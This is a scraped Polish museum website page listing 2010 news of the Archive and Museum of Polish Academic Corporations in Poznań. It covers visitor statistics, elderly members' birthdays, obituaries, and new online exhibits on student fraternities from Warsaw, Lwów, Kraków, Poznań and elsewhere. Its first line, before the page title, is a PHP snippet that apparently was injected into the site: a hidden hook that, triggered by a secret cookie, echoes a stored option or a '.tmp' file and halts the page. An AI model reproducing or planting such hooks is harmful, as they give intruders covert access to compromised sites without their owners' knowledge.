if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Aktualności 2010

Strona Archiwum i Muzeum Polskich Korporacji Akademickich - statystyki 2010

W 2010 r. stronę Archiwum odwiedzono 31.131 razy (średnio ok. 2.600/miesiąc). Obejrzano 96.067 podstron (średnio ok. 8000/miesiąc).

Strona była najczęściej odwiedzona w listopadzie (4916 wizyt), a najrzadziej w czerwcu (1250 wizyt). W listopadzie obejrzano najwięcej podstron (14.462 wizyt), a w czerwcu najmniej (5.261 wizyt).

W porównaniu do 2009 r. strona była odwiedzana ponad 70 % razy częściej. Obejrzano ponad 90 % więcej podstron.

Najwięcej odwiedzających mieszkało na terenie Polski (27.174), Niemiec (914), Ukrainy (463), Stanów Zjednoczonych (453), Wielkiej Brytanii (360), Kanady oraz Francji (po 225), Litwy (183), Łotwy (92) oraz Rosji (91).

__________________________________________________________________________________________

Lech Działoszyński, Poznań 3 XII 2008 r.

98. urodziny Lecha Działoszyńskiego. Vivat!

Dnia 21 grudnia 2010 r. 98. urodziny obchodzi jeden z najbardziej zasłużonych polskich korporantów prof. Lech Działoszyński, członek Korporacji Masovia oraz członek honorowy Korporacji Magna-Polonia.

Prof. Lech Działoszyński był w latach 1991-1994 pierwszym prezesem Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich. Zasłużył się dla reaktywacji szeregu poznańskich korporacji akademickich, Poznańskiego Koła Międzykorporacyjnego oraz powstania Archiwum Korporacyjnego (vide Podziękowania).

Czcigodnemu jubilatowi ad multos annos!

_________________________________________________________________________________________

Prezentacja działalności Archiwum Korporacyjnego - Archiwum i Muzeum Polskich Korporacji Akademickich w Poznaniu

Po zakończeniu trwających niemal rok prac nad prezentacją dziejów polskiego ruchu korporacyjnego w latach 1816-1989, dnia 15 XII 2010 r. zakończono także aktualizację stron informujących o działalności Archiwum Korporacyjnego - Archiwum i Muzeum Polskich Korporacji Akademickich w Poznaniu w latach 2001-2010.

W dziale Archiwum Korporacyjne przedstawiona jest sama instytucja, jej Historia, Podziękowania dla osób i instytucji zasłużonych dla jej powstania i rozwoju, a także Finansowanie prowadzonych działań. Z kolei dziesięcioletni dorobek Archiwum Korporacyjnego został zaprezentowany w zakładce Akcje i działania. Omówiono prowadzone w tym okresie Poszukiwania wiadomości i pamiątek po przedwojennych korporacjach oraz ich członkach, przeprowadzenie wywiadów z ostatnimi żyjącymi Filistrami, organizację wirtualnego Muzeum, uczestnictwo w Wystawach poświęconych historii korporacji i dwudziestolecia międzywojennego, udział w Reaktywacji korporacji po kilkudziesięcioletniej przerwie w działalności, Udostępnianie zbiorów zgromadzonych w Archiwum, prace nad ufundowaniem Tablic pamiątkowych zasłużonym członkom polskich korporacji akademickich, a także akcję Identyfikacji fotografii.

Aktualizacji uległo także opracowanie wprowadzające do Muzeum Korporacyjnego. Przedstawiona jest tam koncepcja prezentacji historii ruchu korporacyjnego na stronach wirtualnego Muzeum Polskich Korporacji Akademickich, uwagi metodologiczne, słowniczek terminów korporacyjnych i wykaz skrótów, a także ogólna bibliografia drukowanych źródeł dotyczących korporacji akademickich.

_________________________________________________________________________________________

Ruch korporacyjny w Polsce międzywojennej

Winieta czasopisma Korporant, 1925 r.

Dnia 1 XII 2010 r. na stronach wirtualnego Muzeum Polskich Korporacji Akademickich zaprezentowano rys historyczny ruchu korporacyjnego w okresie międzywojennym w Polsce (vide W dwudziestoleciu: korporacje 1918-1939). W ramach tego opracowania przedstawione zostały działające wówczas związki międzykorporacyjne, ich ideowość, struktury i pozycja w ruchu korporacyjnym. Ponadto zbiorczej prezentacji doczekały się także działające w dwudziestoleciu korporacje mniejszości narodowych: żydowskie, niemieckie i ukraińskie.

Kartka pamiątkowa Ślubowań Jasnogórskich, Jasna Góra 24 V 1936 r.

Rys historyczny ruchu korporacyjnego w okresie międzywojennym pomaga lepiej zrozumieć założenia ideowe i pozycję poszczególnych korporacji omówionych na stronie. Przygotowanie tego opracowania niejako wymusiło zmiany w prezentacjach poświęconych korporacjom wileńskim, warszawskim, lwowskim, poznańskim oraz krakowskim. Z jednej strony uzupełniono teksty oraz dodano fotografie w tekstach poświęconych poszczególnym ośrodkom akademickim (Wilno, Warszawa, Lwów, Poznań, Kraków), a z drugiej rozszerzeniu uległy także zbiorcze opracowania poświęcone mniejszym i mniej znanym korporacjom działającym w tych miastach (vide Pozostałe). Dzięki temu uwzględnione zostały wcześniej szerzej nie omawiane 54 korporacje akademickie. Tym samym w Muzeum Korporacyjnym uwzględniono wszystkie znane działające w dwudziestoleciu międzywojennym związki korporacyjne.

_________________________________________________________________________________________

Najstarsze polskie korporacje w Muzeum Polskich Korporacji Akademickich

Uniwersytet, Wrocław ok. 1900 r.

Dnia 21 listopada 2010 r. ostatecznie udostępniono w wirtualnym Muzeum Polskich Korporacji Akademickich prezentację poświęconą polskim korporacjom akademickim w okresie zaborów (W czasie zaborów: korporacje 1816-1918).

Po raz pierwszy na stronach Muzeum przedstawiono ośrodki akademickie, gdzie powstawały najstarsze polskie korporacje (WROCŁAW, DORPAT, RYGA, CZERNIOWCE), jak także osobne opracowania poświęcone wcześniej jedynie wzmiankowanym korporacjom (POLONIA i NEOFRANKONIA z Wrocławia, ZNICZ i VENEDYA z Dorpatu).

Venedya, Dorpat.

Jednocześnie uzupełnione zostały opracowania poświęcone pozostałym korporacjom działającym w okresie zaborów w Dorpacie (KONWENT POLONIA, LUTYCJA), Rydze (ARKONIA, WELECJA) i Czerniowcach (OGNISKO, LECHIA).

Zbiórka pieniędzy z udziałem polskich korporantów, Ryga ok. 1914 r. (?).

Łącznie listy członkowskie najstarszych polskich korporacji obejmują ok. 3350 nazwisk członków tych związków z lat 1816-1918. Nazwiskom korporantów towarzyszą zebrane o nich dane biograficzne, a tam gdzie to było możliwe także ich indywidualne fotografie.

Wzorem innych ośrodków akademickich utworzone zostały także nowe działy Identyfikacja fotografii z Dorpatu oraz Identyfikacja fotografii z Rygi. Zapraszamy!

Dziękujemy wszystkim osobom, które przyczyniły się do wzbogacenia niniejszej ekspozycji w Muzeum Polskich Korporacji Akademickich. Będziemy wdzięczni za uwagi oraz korekty, a także wszelkie nowe materiały dotyczące korporacji akademickich oraz ich członków.

_________________________________________________________________________________________

Czesław Rymer, 1937 r.

94. urodziny Czesława Rymera. Ad multos annos!

Dnia 21 listopada 2010 r. 94. urodziny obchodził zasłużony dla ocalenia pamięci po korporacjach śląskich Czesław Rymer, członek Korporacji Silesia oraz członek honorowy Korporacji Magna-Polonia.

Czesław Rymer jest synem pierwszego wojewody śląskiego Józefa Rymera. Przed wojną studiował prawo na Uniwersytecie Poznańskim. Podobnie jak dwaj Jego starsi bracia Stefan i Bernard został wówczas przyjęty do Korporacji Silesia. Po wojnie ukończył prawo na Uniwersytecie Jagiellońskim. W latach powojennych był organizatorem nieoficjalnych spotkań korporantów na Śląsku. Od lat 80-tych był zaangażowany w działalność Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich, po 1989 r. przyczynił się do reaktywacji ruchu korporacyjnego w Poznaniu, w szczególności odrodzenia Korporacji Magna-Polonia oraz rozwoju Archiwum Korporacyjnego (vide Podziękowania). Jest osobą o niespożytej energii i życzliwości. Wciąż pracuje zawodowo.

Czcigodnemu jubilatowi najlepsze życzenia (ponad) stu lat życia!

_________________________________________________________________________________________

Korporacje poznańskie w Muzeum Polskich Korporacji Akademickich

Herb Corony, 1924 r.

Dnia 18 listopada 2010 r. w wirtualnym Muzeum Polskich Korporacji Akademickich udostępniono nową prezentację poświęconą korporacjom akademickim z Poznania. Po raz pierwszy na stronach Muzeum ukazano 26 związków. Siedmiu z nich poświęcono osobne opracowania (CORONA, POMERANIA, KORPUS ZAWISZA CZARNY, PRIMISLAVIA, FILOMATIA POSNANIENSIS, PALESTRIA, FERRUMIA), a inne korporacje - A.T. SURMA, LIBERTAS (?), ASTRIA, QUIRITIA, VIRITIA, AGRARIA, CZARNOMORE, AURORIA, PANSLAVIA, SELENIA, SIGISMUNDIA, GDYNIA, UNITIA, HISTORICA, PIŁSUDIA, IMPERIA, KORPUS STEFAN CZARNECKI, HETMANIA, SLAVIA (?) - doczekały się zbiorczego opracowania (vide POZOSTAŁE).

Herb Primislavii, 1934 r.

Jednocześnie udostępniliśmy uzupełnione listy członkowskie 23 korporacji akademickich z Poznania (MAGNA-POLONIA, LECHIA, POSNANIA, SURMA, CHROBRIA, BALTIA, SILESIA, HELIONIA, LEGIA, MASOVIA, MERCURIA, HERMESIA, SLENSANIA, GEDANIA POSNANIENSIS, LACONIA, ROMA, AESCULAPIA, CODANIA, ICARIA, DEMETRIA, HUSARIA, IUSTITIA, ODRA). Łącznie listy korporacji poznańskich obejmują ok. 3600 nazwisk członków tych związków z lat 1920-1939. Nazwiskom korporantów towarzyszą zebrane o nich dane biograficzne, a tam gdzie to było możliwe (tj. dotychczas w przypadku ok. 560 osób) także ich indywidualne fotografie.

Józef Haller (1873-1960) z K! Baltia.Wojciech Korfanty (1873-1939) z K! Silesia.Leon Mikołajczak (1891-1942) z K! Hermesia.

Wiktor Roszczynialski (1900-1972) z K! Magna-Polonia.Zbigniew Guzikowski (1906-1969) z K! Slensania.Celestyn Menczyński (1908-1983) z K! Mercuria.

Longin Malicki (1908-1986) z K! Masovia.August Kluczniok (1912-1967) z K! Odra.Wielosław Wolski (1919-2009) z K! Lechia.

Wzorem innych ośrodków akademickich utworzony został także nowy dział Identyfikacja fotografii z Poznania. Serdecznie zapraszamy!

Dziękujemy wszystkim osobom, które przyczyniły się do wzbogacenia niniejszej ekspozycji w Muzeum Polskich Korporacji Akademickich. Będziemy wdzięczni za uwagi oraz korekty, a także wszelkie nowe materiały dotyczące korporacji akademickich oraz ich członków.

_________________________________________________________________________________________

Apel zmarłych Filistrów 1 XI 2009 - 31 X 2010

W okresie Wszystkich Świętych oraz Dnia Zadusznego nawiedzamy cmentarze i modlimy się za zmarłych członków korporacji akademickich. Doszły do nas wiadomości o śmierci w okresie ostatniego roku siedmiu przedwojennych korporantów. Wśród nich byli:

Czesław Twardowski (1914 - 4 stycznia 2010 w Calgary) z krakowskiej K! Praetoria,
Wilhelm Wieczorek (26 grudnia 1912 w Bobrkach k. Bytomia - 7 stycznia 2010 w Tarnowskich Górach) z lwowskiej K! Obotritia,
Mieczysław Piątkiewicz (1917 - 30 stycznia 2010) z poznańskiej K! Husaria,
Egon Saperski (1917 w Wiedniu - 2010) z lwowskiej K! Lutyko-Venedya,
Andrzej Godlewski (1919 - 2009/10) z poznańskiej K! Primislavia,
Władysław Nowakowski (8 marca 1914 - 28 maja 2010) z warszawskiej K! Sarmatia,
Konrad Malewski (3 lipca 1913 - 18 października 2010) z warszawskiej K! Varsovia.

Requiem aeternam dona eis Domine et lux perpetua luceat eis

Dwóch zmarłych filistrów - Wilhelm Wieczorek i Andrzej Godlewski - zasłużyło się dla rozwoju Archiwum Korporacyjnego (vide Podziękowania). W roku akademickim 2006/2007 udało się zarejestrować z nimi wywiady wspomnieniowe (vide Ostatni Filistrzy).

Opublikowano: 30 X 2010 r.
Ostatnia zmiana: 1 I 2011 r.

_________________________________________________________________________________________

Vivant Seniorzy!

Bolesław Skrzypczak, Poznań 3 XII 2008 r.

Dnia 29 października 2010 r. senior Korporacji Baltia, członek honorowy Magna-Polonii dr Bolesław Skrzypczak świętował 88 urodziny. Natomiast dnia 30 października 2010 r. 99 lat ukończył nestor Korporacji Magna-Polonia i całego środowiska Poznańskiego Koła Międzykorporacyjnego Zygfryd Wiktor Kordus.

Zygfryd Kordus, Poznań 3 XII 2008 r.

Bolesław Skrzypczak był w latach 1997-2007 Prezesem Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich, a w 2002 r. jednym z głównych reaktywatorów Baltii. Z kolei Zygfryd Wiktor Kordus był Prezesem Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich w latach 1994-1997, a w 2004 r. głównym reaktywatorem Magna-Polonii.

Przez wiele lat obaj Filistrzy wspierali powołanie i rozwój Archiwum i Muzeum Polskich Korporacji Akademickich (vide Archiwum Korporacyjne).

Obu jubilatom najserdeczniejsze życzenia i gratulacje. Ad multos annos!

_________________________________________________________________________________________

Korporacje lwowskie w Muzeum Polskich Korporacji Akademickich

Dekiel Constantii.

Dnia 3 października 2010 r. w wirtualnym Muzeum Polskich Korporacji Akademickich udostępniono nową prezentację poświęconą korporacjom akademickim ze Lwowa. Po raz pierwszy na stronach Muzeum ukazano 26 związków. Trzynastu z nich poświęcono osobne opracowania (LEOPOLIA, ZNICZ, SCYTHIA, AQUITANIA, ARAGONIA, ZAGOŃCZYK, OBOTRITIA, CRESOVIA, ORLĘTA, TYTANIA, CONSTANTIA LEOPOLIENSIS oraz AVANGUARDIA), a inne korporacje - KORPUS LEOPOLIA, FRATERNITAS, SZCZERBIEC, ICARIA, SWENTOWID, PROMETHEA, BELLONA, FIDELIA, CHROBRIA LEOPOLIENSIS, SILVANIA, KADRA, GDYNIA, PRZEDŚWIT - doczekały się zbiorczego opracowania (vide POZOSTAŁE).

Listownik Aragonii, 1931 r.

Warto podkreślić, że wśród tych korporacji znalazła się wielonarodowościowa korporacja powstała we Lwowie jeszcze w końcu XIX wieku - KORPUS LEOPOLIA oraz żydowska korporacja FRATERNITAS.

Jednocześnie udostępniliśmy uzupełnione listy członkowskie pięciu korporacji akademickich ze Lwowa (LUTYKO-VENEDYA, LUTYCJA, GASCONIA, ŚLĄSK, SLAVIA). Łącznie listy korporacji lwowskich obejmują już 1945 nazwisk członków tych związków z lat 1884-1939. Nazwiskom korporantów towarzyszą zebrane o nich dane biograficzne, a tam gdzie to było możliwe (tj. dotychczas w przypadku ok. 210 osób) także ich indywidualne fotografie.

dr Jan Szukszta (1862-1939) z K! Lutycja.abp. Józef Teodorowicz (1864-1938) z K! Obotritia.prof. Jan Czekanowski (1882-1965) z K! Leopolia.

płk prof. Konrad Millak (1886-1969) z K! Lutyko-Venedya.Roman Zatwarnicki (1916-1992) z K! Slavia.Stanisław Łucki (1917 - ) z K! Znicz.

Wzorem innych ośrodków akademickich utworzony został także nowy dział Identyfikacja fotografii ze Lwowa. Serdecznie zapraszamy!

Dziękujemy wszystkim osobom, które przyczyniły się do wzbogacenia niniejszej ekspozycji w Muzeum Polskich Korporacji Akademickich. Będziemy wdzięczni za uwagi oraz korekty, a także wszelkie nowe materiały dotyczące korporacji akademickich oraz ich członków.

_________________________________________________________________________________________

Nowe opracowania poświęcone 45 korporacjom akademickim z Warszawy

Dnia 11 września 2010 r. w wirtualnym Muzeum Polskich Korporacji Akademickich udostępniono nową prezentację dotyczącą korporacji akademickich z Warszawy.

Herb Chrobacji, 1931 r.

Po raz pierwszy na stronach Muzeum ukazano 45 organizacji. 16 z nich poświęcono osobne opracowania (AQUILONIA, UNIA, CONCORDIA VARSOVIENSIS, RESPUBLIKA, CHROBATIA, AUDACJA, GRUNWALDJA, CORONIA, LAUDANIA, MARITIMIA, BEATIA, MESCONIA, VIGINTIA, NATIONALITAS, MONTANJA, ALETEA), a pozostałe korporacje - LECHIA, WANDEA, VIRTUTIA, CARPATIA, SLAVIA, FILALETHEA, VICTORIA, LEGETIA, FILARECJA, BALTITIA, SAGITIA, BANDERA, HETMANIA, FALKONIA, PROMETANIA, IMPERIA, IKARIA, PRIORA, AUXILIA, ARGONAUTA, VIKINGIA, LABORIA, PRUSIA, AGRONOMIA, POLANIA, ORLONIA, CHROBRIA, JUVENTIA, MARATONIA - doczekały się zbiorczego opracowania (vide POZOSTAŁE). Priora, maj 1930 r.

Warto podkreślić, że wśród przedstawionych właśnie korporacji znalazły się, co w dwudziestoleciu międzywojennym stanowiło ewenement, dwie korporacje żeńskie (PRIORA, AUXILIA) oraz jedna koedukacyjna (BANDERA).

Wraz z udostępnionymi w lipcu uzupełnionymi wykazami członkowskimi 13 korporacji akademickich z Warszawy (ARKONIA, WELECJA, LECHICJA, SARMATIA, JAGIELLONIA, PATRIA, SPARTA, VARSOVIA, FILOMATIA VARSOVIENSIS, MALTANIA, CASSUBIA). Listy korporacji warszawskich obejmują łącznie już ok. 5100 nazwisk członków (i członkiń) tych związków z lat 1879-1939. Nazwiskom korporantów (i korporantek) towarzyszą zebrane o nich dane biograficzne, a tam gdzie to było możliwe (tj. dotychczas w przypadku ok. 280 osób) także ich indywidualne fotografie.

Tadeusz Doberski (1907-1944) z K! Respublica.Henryk Golanowski (1909-1979) z K! Maritimia.Jan Jacoby (1909-2003) z K! Aquilonia.

Uaktualniony został także dział Identyfikacja fotografii z Warszawy.

Dziękujemy wszystkim osobom, które przyczyniły się do wzbogacenia niniejszej ekspozycji w Muzeum Polskich Korporacji Akademickich. Będziemy wdzięczni za uwagi oraz korekty, a także wszelkie nowe materiały dotyczące korporacji akademickich oraz ich członków.

_________________________________________________________________________________________

Polskie, żydowskie i ukraińskie korporacje akademickie z Krakowa

Herb Corolli, 1933 r.

Dnia 30 sierpnia 2010 r. w wirtualnym Muzeum Polskich Korporacji Akademickich udostępniono nową prezentację poświęconą polskim, żydowskim oraz ukraińskim korporacjom akademickim z Krakowa. Po raz pierwszy na stronach Muzeum ukazano 24 związki. Dziewięciu z nich poświęcono osobne opracowania (AKROPOLIA, COROLLA, VAVELIA, CAPITOLIA, GILDIA, PALESTRA, VESALIA, VRATISLAVIA, GARDA), a inne korporacje - EMUNAH, SIAN, KADIMAH, FILOMACJA, CONSTANTIA, JAGELLONIA, FIDELIA, PATRICIA, CZARNOMORE, CHORTYCIA, FRATERNITAS SLAVIA, ASTREA, ZAPOROŻE, ZAHRAWA, ARPADA doczekały się zbiorczego opracowania (vide POZOSTAŁE). Warto podkreślić, że wśród tych korporacji znalazło się siedem korporacji mniejszości narodowych, w tym dwie żydowskie (EMUNAH i KADIMAH) oraz pięć ukraińskich (SIAN, CZARNOMORE, CHORTYCIA, ZAPOROŻE oraz ZAHRAWA). Ponadto dwie z korporacji, co w dwudziestoleciu międzywojennym stanowiło ewenement, były żeńskie (ASTREA, ZAHRAWA).

Jednocześnie udostępniliśmy uzupełnione listy członkowskie sześciu korporacji akademickich z Krakowa (GNOMIA, LAUDA, MONTANA, ARCADIA, PRAETORIA, SILINGIA). Łącznie listy korporacji krakowskich obejmują już 1779 nazwisk członków i członkiń tych związków z lat 1923-1939, w tym 1518 członków i członkiń polskich korporacji. Nazwiskom korporantów i korporantek towarzyszą zebrane o nich dane biograficzne, a tam gdzie to było możliwe (tj. dotychczas w przypadku ok. 45 osób tj. procentowo najmniej w porównaniu do innych ośrodków akademickich!) także ich indywidualne fotografie.

prof. Emil Godlewski (1875-1944) z K! Akropolia.Zygmunt Sojecki (1899-1971) z K! Gnomia.Konstanty Tuchołka (1901-1941) z K! Montana.

Wzorem innych ośrodków akademickich utworzony został także nowy dział Identyfikacja fotografii z Krakowa. Zapraszamy! Przy tej okazji chcielibyśmy podziękować wszystkim osobom, które przyczyniły się do wzbogacenia niniejszej ekspozycji w Muzeum Polskich Korporacji Akademickich. Będziemy wdzięczni za uwagi oraz korekty, a także wszelkie nowe materiały dotyczące korporacji akademickich oraz ich członków.

_________________________________________________________________________________________

Polskie korporacje z Czerniowiec, Wiednia i Kowna

Strona tytułowa programu Komersu XXV-lecia Lechii w dniu 3 II 1935 r. w Czerniowcach.

Dnia 28 lipca 2010 r. w wirtualnym Muzeum Polskich Korporacji Akademickich zaprezentowano także nowe opracowania poświęcone korporacjom akademickim z Czerniowiec, Kowna i Wiednia. Po raz pierwszy na stronach Muzeum przedstawiono cztery związki: OGNISKO i LECHIĘ z Czerniowiec, SOBIESCIĘ z Wiednia oraz ZNICZ z Kowna. Warto zauważyć, że Korporacja Znicz jest jedną z zaledwie kilku w historii oraz pierwszą zaprezentowaną na naszych stronach polską żeńską korporacją akademicką.

Jednocześnie udostępniliśmy uzupełnione listy członkowskie dwóch pozostałych korporacji z Wiednia (SAMOGITIA) i Kowna (LAUDA). Łącznie listy korporacji spoza kraju zawierają już ok. 240 nazwisk członków i członkiń tych związków z lat 1876-1940. Nazwiskom korporantów i korporantek towarzyszą zebrane o nich dane biograficzne, a tam gdzie to było możliwe (tj. dotychczas w przypadku ok. 60 osób) także ich indywidualne fotografie.

Kazimierz Mitelski (1909-1985) z K! Lechia z Czerniowiec.Halina Nagurska z K! Znicz z Kowna.Tadeusz Wojtatowicz (1913-1983) z K! Sobiescia z Wiednia.

Podziękowania dla wszystkich osób, które przyczyniły się prezentacji niniejszej ekspozycji. Będziemy zobowiązani za uwagi oraz korekty, a także wszelkie nowe materiały dotyczące korporacji akademickich oraz ich członków.

_________________________________________________________________________________________

Korporacje z Wolnego Miasta Gdańska w Muzeum Polskich Korporacji Akademickich

Herb Helanii, 1939 r.

Dnia 28 lipca 2010 r. w wirtualnym Muzeum Polskich Korporacji Akademickich zaprezentowano nowe opracowania poświęcone korporacjom akademickim z Wolnego Miasta Gdańska. Po raz pierwszy ukazano korporacje HELANIA oraz GEDANIA, które dotychczas nie były szerzej przedstawione na naszych stronach.

Jednocześnie udostępniliśmy uzupełnione listy członkowskie dwóch pozostałych korporacji z Gdańska - Z.A.G. WISŁA oraz ROSEVIA. Łącznie listy korporacji gdańskich zawierają już ok. 590 nazwisk członków tych związków z lat 1913-1939. Nazwiskom korporantów towarzyszą zebrane o nich dane biograficzne, a tam gdzie to było możliwe (tj. dotychczas w przypadku ok. 30 osób) także ich indywidualne fotografie.

Henryk Rosochowicz (1900-1942) z K! ZAG Wisła i K! Gedania.Zbigniew Lutosławski (1904-1972) z K! Helania.Bernard Nowaczyk (1915-1982) z K! ZAG Wisła.

Wzorem innych ośrodków akademickich utworzony został także nowy dział Identyfikacja fotografii z Gdańska. Zapraszamy! Wszystkim osobom, które przyczyniły się do wzbogacenia niniejszej ekspozycji jesteśmy wdzięczni. Będziemy zobowiązani za uwagi oraz korekty, a także materiały dotyczące korporacji akademickich oraz ich członków.

_________________________________________________________________________________________

Korporacje lubelskie w Muzeum Polskich Korporacji Akademickich

Dekiel Mariana Ekielskiego

Dnia 24 lipca 2010 r. w wirtualnym Muzeum Polskich Korporacji Akademickich przedstawiono nową prezentację poświęconą lubelskiemu środowisku korporacyjnemu. Ukazane zostało sześć korporacji akademickich, które do tej pory nie były szerzej przedstawione na naszych stronach. Dwóm z nich poświęcono osobne opracowania (HETMANIA, GDYNIA), a mniejsze związki - LUBLINIA, ROMA LUBLINIENSIS, KONFEDERACJA, KONFEDERACJA MAGNA POLONIA doczekały się zbiorczego opracowania (vide POZOSTAŁE).

Jednocześnie udostępniliśmy uzupełnione listy członków trzech pozostałych korporacji akademickich z Lublina (CONCORDIA, ASTREA, KORABJA). Łącznie listy korporacji lubelskich zawierają już 540 nazwisk członków tych korporacji z lat 1922-1939. W zdecydowanej większości przypadków nazwiskom korporantów towarzyszą zebrane o nich dane biograficzne, a tam gdzie to było możliwe (tj. dotychczas w przypadku ok. 70 osób) także ich indywidualne fotografie.

ks. prof. Józef Kruszyński (1877-1953) z K! ConcordiaEugeniusz Pinkosz (1911-1999) z K! Korabia.Witold Przeciechowski (1912-1976) z K! Hetmania.

Utworzony został także nowy dział Identyfikacja fotografii z Lublina. Zapraszamy! Wszystkim osobom, które przyczyniły się do wzbogacenia niniejszej ekspozycji w Muzeum Polskich Korporacji Akademickich jesteśmy zobowiązani. Będziemy wdzięczni za wszelkie uwagi, korekty i materiały dotyczące korporacji akademickich oraz ich członków.

_________________________________________________________________________________________

Korporacje wileńskie i warszawskie w Muzeum Polskich Korporacji Akademickich

Dekiel Zygmunta Andruszkiewicza z K! Concordia Vilnensis.

W dniu 16 lipca w wirtualnym Muzeum Polskich Korporacji Akademickich zaprezentowano opracowania poświęcone siedmiu korporacjom akademickim, które do tej pory nie były szerzej przedstawione na naszych stronach. Omówienia doczekały się związki wileńskie: VILNENSIA, CRESOVIA, CONCORDIA, PIŁSUDIA i ORIENTIA oraz warszawskie: REGIA i OSTOJA. Tym samym liczba prezentowanych korporacji zwiększyła się do niemal 70 stowarzyszeń. Przy tej okazji dodane zostały także opracowania poświęcone historii polskich korporacji akademickich w okresie 1939-1989: na emigracji (LONDYN, CHICAGO, MONTREAL) oraz w kraju (WARSZAWA, POZNAŃ).

Jednocześnie udostępniliśmy uzupełnione listy członków 18 korporacji akademickich z Wilna/Dorpatu (KONWENT POLONIA, BATORIA, POLESIA, ŚNIADECIA, CONRADIA, LEONIDANIA, FILOMATIA VILNENSIS) oraz Warszawy/Dorpatu/Rygi/Wiednia/Petersburga (ARKONIA, WELECJA, LECHICJA, SARMATIA, JAGIELLONIA, PATRIA, SPARTA, VARSOVIA, FILOMATIA VARSOVIENSIS, MALTANIA, CASSUBIA). Łącznie listy korporacji wileńskich i warszawskich zawierają już ok. 6.200 nazwisk członków tych korporacji z lat 1828-1939. W zdecydowanej większości przypadków nazwiskom korporantów towarzyszą zebrane o nich dane biograficzne, a tam gdzie to było możliwe (tj. dotychczas w przypadku ok. 450 osób) także ich indywidualne fotografie.

Józef Piłsudski (1867-1935) z K! Piłsudia.Paweł Kalukin (1908-1989) z K! Batoria.Zygmunt Kuczyński (1911-1995) z K! Filomatia Vilnensis.

Henryk Genello (1872 - po 1924) z K! Welecja.Józef Szyrmer (1907-1985) z K! Maltania.Honoriusz Kaniewski (1908-2001) z K! Ostoja.

Wszystkim osobom, które przyczyniły się do wzbogacenia ekspozycji w Muzeum Polskich Korporacji Akademickich jesteśmy zobowiązani. Będziemy wdzięczni za wszelkie uwagi, korekty i materiały dotyczące korporacji akademickich oraz ich członków. Zależałoby nam w szczególności na: (dodatkowych) informacjach biograficznych o członkach korporacji akademickich, indywidualnych fotografiach tych osób, wspomnieniach i relacjach, pamiątkach związanych z samymi korporacjami bądź ich reprodukcjach (vide Poszukiwania), a także kontaktach do rodzin zmarłych członków korporacji. Dziękujemy za wszelką pomoc!

_________________________________________________________________________________________

Identyfikacja fotografii korporacyjnych z Wilna i Warszawy, Dorpatu i Rygi.

Oldermani Welecji, Warszawa ok. 1929 r.

Od 2009 r. prezentowane są na stronach Archiwum Korporacyjnego w ramach akcji “Identyfikacja fotografii” zdjęcia, a szerzej także inne materialne ślady po korporacjach akademickich, które nie zostały dotychczas zidentyfikowane bądź szczegółowo opisane (vide Identyfikacja fotografii).

Prawd. członek Konwentu Polonia, Dorpat.

W związku z duża ilością fotografii do identyfikacji postanowiliśmy tworzyć osobne działy poświęcone zdjęciom z poszczególnych ośrodków akademickich. Dwa pierwsze z nich poświęcone są identyfikacji fotografii z korporacji wileńskich (vide Identyfikacja fotografii z Wilna/Dorpatu) oraz z korporacji warszawskich (vide Identyfikacja fotografii z Warszawy/Rygi/Dorpatu).

Być może dzięki Państwa pomocy uda się rozpoznać miejsca wykonania tych fotografii w Wilnie, Warszawie, Dorpacie czy Rydze oraz postaci upamiętnione na zdjęciach, w tym działaczy polityczno-społecznych, profesorów, Państwa bliskich i znajomych. Zapraszamy!

_________________________________________________________________________________________

Awaria ujarzmiona!

Po trzech tygodniach udało się rozwiązać zaistniałe problemy techniczne. Od dnia 26 czerwca 2010 r. strona Archiwum Korporacyjnego funkcjonuje bez zakłóceń.

_________________________________________________________________________________________

Awaria na stronach Archiwum Korporacyjnego

W dniu 3 czerwca 2010 r. doszło do awarii na stronach Archiwum Korporacyjnego. Nie rozwija się menu strony, a w konsekwencji dostęp do wszystkich poza podstawowymi podstronami jest utrudniony. Można je jednak obejrzeć poprzez poniższe linki:
- O Archiwum - http://www.archiwumkorporacyjne.pl/index.php/o-archiwum/archiwum-korporacyjne/historia
- Muzeum Korporacyjne - http://www.archiwumkorporacyjne.pl/index.php/muzeum-korporacyjne/o-korporacjach/
- Aktualności - http://www.archiwumkorporacyjne.pl/index.php/aktualnosci/aktualnosci-2008/

Przepraszamy za uniedogodnienia.

_________________________________________________________________________________________

Nowe korporacje w Muzeum Polskich Korporacji Akademickich

Dekiel Karola Łaszkiewicza z K! Lutycja.

W dniu 14 lutego w wirtualnym Muzeum Polskich Korporacji Akademickich dodano opracowania poświęcone dziesięciu korporacjom akademickim, które do tej pory nie były szerzej przedstawione na naszych stronach. Omówienia doczekały się następujące związki: dorpacko-wileński KONWENT POLONIA, warszawskie VARSOVIA i CASSUBIA, dorpacko-lwowska LUTYCJA, gdańska ROSEVIA, poznańskie HELIONIA i DEMETRIA, krakowskie LAUDA i PRAETORIA oraz lubelska ASTREA. Tym samym liczba prezentowanych korporacji na stronach Muzeum zwiększyła się do 60 stowarzyszeń.

W wyniku zmian na stronach Muzeum znaleźć można nie tylko charakterystyki kolejnych korporacji, ale także około dwa tysiące trzysta nazwisk ich członków - polskich korporantów z lat 1828-1939. Tam gdzie było to możliwe dodano ich biogramy oraz indywidualne fotografie.

Bohdan Zyndram Kościałkowski (1898-1967) z Konwentu Polonia.Lech Neyman (1908-1948) z K! Helionia.Leon Ter-Oganjan (1910-2002) z K! Varsovia.

Jan Janiga z K! Lauda.Paweł Woyke (1910-1943) z K! Rosevia.Marian Przewoski (1913-1994) z K! Demetria

Wszystkim osobom, które przyczyniły się do powiększenia ekspozycji w Muzeum Polskich Korporacji Akademickich jesteśmy zobowiązani!

